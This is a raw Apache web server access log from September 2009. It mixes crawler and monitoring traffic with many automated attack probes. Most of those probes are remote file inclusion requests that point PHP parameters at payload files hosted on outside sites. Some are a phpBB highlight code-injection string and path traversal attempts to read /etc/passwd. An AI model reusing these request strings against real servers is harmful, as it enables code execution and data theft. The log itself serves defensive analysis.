110.45.146.223 - - [04/Sep/2009:05:34:53 -0400] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:34:53 -0400] "GET /logs/access_log.Q109080100//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:34:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.1.50 - - [04/Sep/2009:05:35:17 -0400] "GET /logs/access_log.Q109071900%20%20/index.php?redir=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:05:35:31 -0400] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:05:35:31 -0400] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.225.95.33 - - [04/Sep/2009:05:36:02 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/albania.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
211.43.202.66 - - [04/Sep/2009:05:39:05 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:39:05 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:39:05 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:39:12 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:39:12 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:39:12 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
209.59.12.99 - - [04/Sep/2009:05:39:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [04/Sep/2009:05:40:03 -0400] "GET /logs/error_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:40:12 -0400] "GET /logs/error_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
65.55.207.76 - - [04/Sep/2009:05:40:44 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):14+RNSUBS(S0040):0 HTTP/1.0" 200 54874 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.80.195.39 - - [04/Sep/2009:05:40:44 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
151.23.90.59 - - [04/Sep/2009:05:41:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:41:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:41:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:41:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.43.202.66 - - [04/Sep/2009:05:41:32 -0400] "GET /logs/access_log.Q109061700%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.43.202.66 - - [04/Sep/2009:05:41:33 -0400] "GET /logs/access_log.Q109061700%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://bidbpersonel.trakya.edu.tr/anasayfa-deneme/yonetim/lib/yukle/XtraUpload_v2-Beta4/idi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
125.141.196.8 - - [04/Sep/2009:05:41:40 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.8 - - [04/Sep/2009:05:41:40 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.141.196.8 - - [04/Sep/2009:05:41:40 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.141.196.8 - - [04/Sep/2009:05:41:46 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:05:43:17 -0400] "GET //skin/zero_vote/error.php?dir=http://aboutav.com//gmn/test.txt? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
77.221.130.31 - - [04/Sep/2009:05:43:17 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://aboutav.com//gmn/test.txt? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
80.67.26.40 - - [04/Sep/2009:05:44:19 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:05:44:19 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:05:44:19 -0400] "GET /logs/access_log.Q109061900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:05:44:23 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:05:44:23 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
80.67.26.40 - - [04/Sep/2009:05:44:23 -0400] "GET /logs/access_log.Q109061900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:44:29 -0400] "GET //index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:05:44:29 -0400] "GET /logs//index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:05:44:29 -0400] "GET /logs/access_log.Q109072300//index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
80.67.26.40 - - [04/Sep/2009:05:44:30 -0400] "GET /logs/error_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:44:32 -0400] "GET /logs//index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:05:44:32 -0400] "GET /logs/access_log.Q109072300//index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:05:44:32 -0400] "GET //index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
80.67.26.40 - - [04/Sep/2009:05:44:36 -0400] "GET /logs/error_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:45:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.23 - - [04/Sep/2009:05:45:21 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:05:45:21 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:05:45:21 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:45:29 -0400] "GET /logs/access_log.Q109081300//index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:05:45:34 -0400] "GET /logs/access_log.Q109081300//index.php?lg=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
151.23.90.59 - - [04/Sep/2009:05:45:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
222.236.47.188 - - [04/Sep/2009:05:46:07 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:46:07 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:46:07 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:46:20 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:46:20 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:05:46:20 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
69.0.163.102 - - [04/Sep/2009:05:47:55 -0400] "GET /logs/access_log.Q109062800/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:05:48:07 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.55.52.154 - - [04/Sep/2009:05:48:51 -0400] "GET /logs/phphtml.php?htmlclass_path=http://mrkz.hellospace.net/fxs/fx29id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.55.52.154 - - [04/Sep/2009:05:48:51 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://mrkz.hellospace.net/fxs/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.55.52.154 - - [04/Sep/2009:05:48:51 -0400] "GET /phphtml.php?htmlclass_path=http://mrkz.hellospace.net/fxs/fx29id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:50:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [04/Sep/2009:05:51:03 -0400] "GET /images/index19_ekgsuppl.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
98.174.154.206 - - [04/Sep/2009:05:52:17 -0400] "GET /logs/access_log.Q109061700//phpads/? HTTP/1.1" 404 233 "-" "libwww-perl/5.814"
98.174.154.206 - - [04/Sep/2009:05:52:17 -0400] "GET //phpads/? HTTP/1.1" 404 206 "-" "libwww-perl/5.814"
98.174.154.206 - - [04/Sep/2009:05:52:17 -0400] "GET /logs//phpads/? HTTP/1.1" 404 211 "-" "libwww-perl/5.814"
74.6.22.87 - - [04/Sep/2009:05:53:03 -0400] "GET /logs/error_log.Q109080700 HTTP/1.0" 200 2479551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.87 - - [04/Sep/2009:05:53:07 -0400] "GET /logs/error_log.Q109080700 HTTP/1.0" 200 2479551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.52.154 - - [04/Sep/2009:05:53:28 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://mrkz.hellospace.net/fxs/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
98.174.154.206 - - [04/Sep/2009:05:54:07 -0400] "GET /logs/error_log.Q109082100//phpads/? HTTP/1.1" 404 232 "-" "libwww-perl/5.814"
222.231.1.50 - - [04/Sep/2009:05:54:53 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:05:54:53 -0400] "GET /phphtml.php?htmlclass_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:05:54:53 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:56:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.87 - - [04/Sep/2009:05:56:26 -0400] "GET /logs/error_log.Q108121900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.115.89.97 - - [04/Sep/2009:05:56:54 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:56:54 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:56:54 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:57:01 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:57:01 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:57:01 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:59:06 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:05:59:08 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:05:59:19 -0400] "GET /logs/error_log.Q108121800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.231.1.50 - - [04/Sep/2009:05:59:38 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.1.50 - - [04/Sep/2009:06:00:15 -0400] "GET /logs/access_log.Q109052900%20%20/phphtml.php?htmlclass_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:06:01:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.158.137.122 - - [04/Sep/2009:06:01:59 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; I)"
119.63.193.55 - - [04/Sep/2009:06:02:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
66.249.71.201 - - [04/Sep/2009:06:02:24 -0400] "GET /logs/access_log.Q109082200 HTTP/1.1" 200 2103181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [04/Sep/2009:06:02:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L117B74460207170083D501T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [04/Sep/2009:06:03:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L117B744601B7570081D501T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.87 - - [04/Sep/2009:06:03:32 -0400] "GET /logs/error_log.Q109080400 HTTP/1.0" 200 3126375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.87 - - [04/Sep/2009:06:03:36 -0400] "GET /logs/error_log.Q109080400 HTTP/1.0" 200 3126375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.201 - - [04/Sep/2009:06:03:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L117B744601D7B70087D501T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.47.106.24 - - [04/Sep/2009:06:04:16 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
147.47.106.24 - - [04/Sep/2009:06:04:16 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
147.47.106.24 - - [04/Sep/2009:06:04:16 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
147.47.106.24 - - [04/Sep/2009:06:04:16 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:06:04:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L117B74460157A7008FD501T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [04/Sep/2009:06:05:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L117B74460227570087D501T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [04/Sep/2009:06:05:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L117B74460187870080D501T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.188 - - [04/Sep/2009:06:06:15 -0400] "GET /logs/access_log.Q109061600%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.65"
74.6.22.87 - - [04/Sep/2009:06:06:18 -0400] "GET /logs/error_log.Q109083000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.188 - - [04/Sep/2009:06:06:21 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
66.249.71.201 - - [04/Sep/2009:06:06:20 -0400] "GET /logs/error_log.Q109090400 HTTP/1.1" 200 528677 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [04/Sep/2009:06:06:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.188 - - [04/Sep/2009:06:06:26 -0400] "GET /logs/access_log.Q109061600%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:06:06:26 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:06:06:29 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
222.236.47.188 - - [04/Sep/2009:06:06:30 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
222.73.17.7 - - [04/Sep/2009:06:07:15 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [04/Sep/2009:06:07:15 -0400] "GET /logs/access_log.Q109061900/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [04/Sep/2009:06:07:15 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:06:06:55 -0400] "GET /logs/error_log.Q109081800 HTTP/1.1" 200 3712282 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
